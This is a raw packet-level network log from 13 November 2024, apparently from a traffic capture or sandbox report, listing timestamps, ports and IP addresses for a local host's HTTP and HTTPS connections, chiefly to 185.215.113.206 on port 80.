Nov 13, 2024 20:39:50.410159111 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.410224915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.410224915 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.437377930 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.437377930 CET	49945	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.437414885 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.437433004 CET	443	49945	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.439228058 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.439265013 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.439671040 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.439682961 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.440762997 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.440773964 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.441570997 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.441576958 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.442167044 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.442167997 CET	49943	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.442238092 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.442275047 CET	443	49943	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.448259115 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448281050 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448292971 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448338985 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.448368073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448379993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448393106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448398113 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448405981 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.448405981 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.448407888 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.448448896 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.448488951 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.449708939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449721098 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449733019 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449778080 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.449781895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449795008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449805975 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449810982 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.449841022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449846983 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.449855089 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449867010 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.449896097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.449896097 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.449932098 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.568883896 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.568991899 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.569068909 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.602855921 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.602931023 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.602972031 CET	49947	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.602992058 CET	443	49947	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.610893965 CET	49952	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.610989094 CET	443	49952	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.611114979 CET	49952	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.612247944 CET	49952	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.612279892 CET	443	49952	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.613687992 CET	49953	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.613775969 CET	443	49953	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.613859892 CET	49953	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.614052057 CET	49953	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.614080906 CET	443	49953	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.615103006 CET	49954	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.615128040 CET	443	49954	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.615223885 CET	49954	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.615854979 CET	49955	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.615875959 CET	443	49955	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.615941048 CET	49955	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.617376089 CET	49954	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.617403030 CET	443	49954	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.617624044 CET	49955	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.617641926 CET	443	49955	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.617935896 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.622817993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.644001961 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.644068003 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.644157887 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.644176006 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.644236088 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.644901037 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.644929886 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.644944906 CET	49946	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.644953012 CET	443	49946	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.651748896 CET	49956	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.651787043 CET	443	49956	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.651856899 CET	49956	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.651993990 CET	49956	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:50.652009964 CET	443	49956	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:50.704989910 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705055952 CET	443	49957	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.705137014 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705310106 CET	49958	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705341101 CET	443	49958	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.705409050 CET	49958	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705530882 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705550909 CET	443	49959	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.705615997 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705895901 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705919981 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.705961943 CET	443	49961	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.706002951 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.706068039 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.706129074 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.706212997 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.706235886 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.706293106 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.706474066 CET	49957	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.706506968 CET	443	49957	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.706648111 CET	49958	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.706667900 CET	443	49958	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.706809998 CET	49959	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.706832886 CET	443	49959	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.706984997 CET	49961	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.707009077 CET	443	49961	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.707109928 CET	49960	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.707144976 CET	443	49960	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.707339048 CET	49962	443	192.168.2.5	23.38.189.114
Nov 13, 2024 20:39:50.707359076 CET	443	49962	23.38.189.114	192.168.2.5
Nov 13, 2024 20:39:50.897505045 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897540092 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897550106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897625923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.897625923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.897680998 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897730112 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.897751093 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897763968 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897808075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.897836924 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897849083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897891998 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.897979021 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.897989035 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898000002 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898025990 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898052931 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898195982 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898206949 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898217916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898228884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898235083 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898247957 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898247004 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898261070 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898288012 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898315907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898372889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898519039 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898530006 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898540020 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898564100 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898591042 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898591995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898605108 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898616076 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898653984 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898654938 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898731947 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898777008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898788929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898793936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898818970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898819923 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898840904 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.898957014 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.898974895 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:50.899008989 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.899008989 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:50.934808016 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:50.934901953 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:50.935008049 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:50.935587883 CET	49963	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:50.935621977 CET	443	49963	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:51.010869026 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.011240005 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.011308908 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.012327909 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.012427092 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.013400078 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.013472080 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.013586044 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.014720917 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014735937 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014746904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014797926 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014807940 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014817953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014831066 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014858007 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.014908075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.014908075 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.014909029 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.014909029 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.014909029 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.014909029 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015045881 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015093088 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015103102 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015105009 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015141964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015141964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015281916 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015291929 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015302896 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015328884 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015332937 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015341043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015355110 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015374899 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015636921 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015649080 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015660048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015671015 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015682936 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015697956 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015726089 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015750885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015779972 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015790939 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015805006 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015836000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015846014 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015858889 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015861034 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015861988 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015871048 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.015885115 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.015912056 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016442060 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016454935 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016473055 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016484022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016495943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016499996 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016509056 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016520977 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016521931 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016535044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016546011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016546011 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016558886 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016563892 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016571999 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016582966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016585112 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016594887 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016608000 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.016609907 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016632080 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.016653061 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.054796934 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.054810047 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.054830074 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.054841995 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.054852009 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.054877043 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.054893970 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.054903984 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.055002928 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.055002928 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.055002928 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.055002928 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.055067062 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.055111885 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.055351973 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.055372953 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.055413961 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.058114052 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.058135986 CET	443	49950	3.168.2.67	192.168.2.5
Nov 13, 2024 20:39:51.101910114 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.102480888 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:51.102550983 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.103368998 CET	49950	443	192.168.2.5	3.168.2.67
Nov 13, 2024 20:39:51.106266022 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.106367111 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:51.107592106 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:51.107703924 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.107820034 CET	49949	443	192.168.2.5	20.125.209.212
Nov 13, 2024 20:39:51.107836962 CET	443	49949	20.125.209.212	192.168.2.5
Nov 13, 2024 20:39:51.146740913 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146759987 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146773100 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146784067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146796942 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146809101 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146821022 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146832943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146843910 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146855116 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146868944 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146883011 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146895885 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146909952 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146920919 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146934032 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.146929979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.146929979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.146929979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.146929979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.146929979 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.146930933 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147048950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147048950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147048950 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147078991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147130966 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147140026 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147141933 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147160053 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147170067 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147181034 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147192001 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147192001 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147203922 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147213936 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147214890 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147227049 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147243023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147243023 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147248030 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147260904 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147269964 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147270918 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147284031 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147294044 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147296906 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147308111 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147331953 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147344112 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.147351027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147351027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147351027 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.147377968 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:51.148026943 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148039103 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148049116 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148061991 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:51.148073912 CET	80	49873	185.215.113.206	192.168.2.5
